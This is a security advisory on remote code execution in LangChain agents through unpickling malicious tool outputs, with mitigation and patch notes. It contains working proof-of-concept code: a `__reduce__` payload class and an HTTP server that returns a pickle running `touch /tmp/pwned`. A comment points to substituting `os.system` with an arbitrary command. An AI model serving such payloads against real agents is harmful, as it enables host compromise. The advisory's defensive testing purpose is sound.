Remote Code Execution in LangChain Agents via Deserialization of Malicious Tool Outputs
Overview
A critical remote code execution (RCE) vulnerability affects agents built with LangChain whose tools can return serialized data, such as Python's `pickle` format. The attack requires that the attacker control the output of a tool the agent interacts with. For instance, an agent designed to query a custom API could be tricked into querying an attacker-controlled endpoint. That endpoint returns a pickled Python object which, when deserialized in the agent's Python environment with `pickle.load()` or `pickle.loads()`, executes arbitrary code.

The vulnerability stems from implicit trust in the data returned by external tools. Developers often build agents that process tool outputs directly, without sanitization, on the assumption that the tools are trusted. An attacker who can compromise or impersonate any single tool in an agent's toolchain can therefore gain full control over the agent's host environment. The impact is severe: complete system compromise, data theft, or lateral movement within the network.
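The mechanism can be illustrated without LangChain at all. The following is a minimal sketch, assuming a hypothetical `Payload` class and a benign side effect (creating an empty directory under a temporary path) in place of an attacker's command. It shows that `pickle` calls whatever callable an object's `__reduce__` method names, at load time.

```python
import os
import pickle
import tempfile


class Payload:
    """Hypothetical attacker-crafted object; the name is illustrative only."""

    def __init__(self, marker: str) -> None:
        self.marker = marker

    def __reduce__(self):
        # pickle stores this (callable, args) pair and invokes it on load.
        # An attacker would return something like (os.system, ("<command>",)).
        return (os.mkdir, (self.marker,))


# Benign side effect: an empty directory inside a fresh temporary directory.
marker = os.path.join(tempfile.mkdtemp(), "pwned")

# This is what a malicious endpoint would send back to the agent.
blob = pickle.dumps(Payload(marker))
assert not os.path.exists(marker)

# This is what vulnerable agent-side code does with the tool output.
pickle.loads(blob)

# The callable ran during deserialization; no method was called explicitly.
assert os.path.isdir(marker)
```

Note that the code runs inside `pickle.loads()` itself, so inspecting or validating the resulting object afterwards is already too late.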
Affected Systems
Testing Guide
1. **Create a Malicious Tool:** Set up a simple web server that returns a malicious pickle payload. The payload should execute a benign command like `touch /tmp/pwned`. You can generate this payload using Python's `pickle` module.
2. **Configure a LangChain Agent:** Create a simple agent that uses a `Requests` or similar tool to make a GET request to your malicious server.
3. **Run the Agent:** Trigger the agent to use the tool and query your server.
4. **Check for Execution:** Check if the file `/tmp/pwned` was created on the machine running the agent. If it exists, your environment is vulnerable.
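Step 1 can be sketched with the standard library alone. The class names, the `serve` helper, and the default host and port below are assumptions chosen for illustration; only the `touch /tmp/pwned` command comes from the steps above. Run this on an isolated test machine only.

```python
import os
import pickle
from http.server import BaseHTTPRequestHandler, HTTPServer


class TouchPayload:
    """Hypothetical test payload that runs a benign command when unpickled."""

    def __reduce__(self):
        # Executed on the machine that unpickles the bytes, not on this server.
        return (os.system, ("touch /tmp/pwned",))


def build_payload() -> bytes:
    # Serializing does not run the command; only deserializing does.
    return pickle.dumps(TouchPayload())


class PayloadHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every GET request with the pickled payload.
        body = build_payload()
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(host: str = "127.0.0.1", port: int = 8000) -> None:
    # Blocks until interrupted; host and port are illustrative defaults.
    HTTPServer((host, port), PayloadHandler).serve_forever()
```

Calling `serve()` starts the test endpoint. The marker file appears only if the agent-side code actually unpickles the response body; a tool that merely returns the response as text to the model will not trigger it.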
Mitigation Steps
1. **Upgrade LangChain:** Update to the latest version of LangChain, which has introduced warnings and safer defaults for tool interactions.
2. **Avoid Insecure Deserialization:** Never use `pickle` to deserialize data from untrusted or unverified sources. Use safe data interchange formats like JSON instead.
3. **Sandbox Tool Execution:** Run agents and their tools in isolated, sandboxed environments (e.g., containers with restricted permissions and no network access) to limit the blast radius of a potential compromise.
4. **Validate Tool Output:** Treat all data returned from tools as untrusted. Implement strict validation and sanitization on tool outputs before processing them further.
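Steps 2 and 4 can be combined in a small wrapper around whatever code receives the tool's raw bytes. This is a minimal sketch rather than a LangChain API: the function name `parse_tool_output`, the field names in `EXPECTED_FIELDS`, and the size limit are all assumptions to adapt to the tool in question.

```python
import json

# Hypothetical schema: the exact fields this tool is expected to return.
EXPECTED_FIELDS = {"status": str, "result": str}
MAX_BYTES = 64 * 1024  # illustrative upper bound on response size


def parse_tool_output(raw: bytes) -> dict:
    """Parse tool output as JSON and reject anything outside the schema."""
    if len(raw) > MAX_BYTES:
        raise ValueError("tool output exceeds size limit")
    try:
        # json.loads only builds plain data types; it never runs code.
        data = json.loads(raw.decode("utf-8"))
    except ValueError as exc:
        # Covers both UnicodeDecodeError and json.JSONDecodeError.
        raise ValueError("tool output is not valid UTF-8 JSON") from exc
    if not isinstance(data, dict):
        raise ValueError("tool output must be a JSON object")
    if set(data) != set(EXPECTED_FIELDS):
        raise ValueError("tool output has missing or unexpected fields")
    for name, expected_type in EXPECTED_FIELDS.items():
        if not isinstance(data[name], expected_type):
            raise ValueError(f"field {name!r} has the wrong type")
    return data
```

With this in place, a pickled response fails at the decoding step and is never deserialized, while a well-formed response such as `{"status": "ok", "result": "42"}` passes through as a plain dictionary.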
Patch Details
LangChain versions 0.2.5 and later include improved safety measures and warnings against insecure patterns.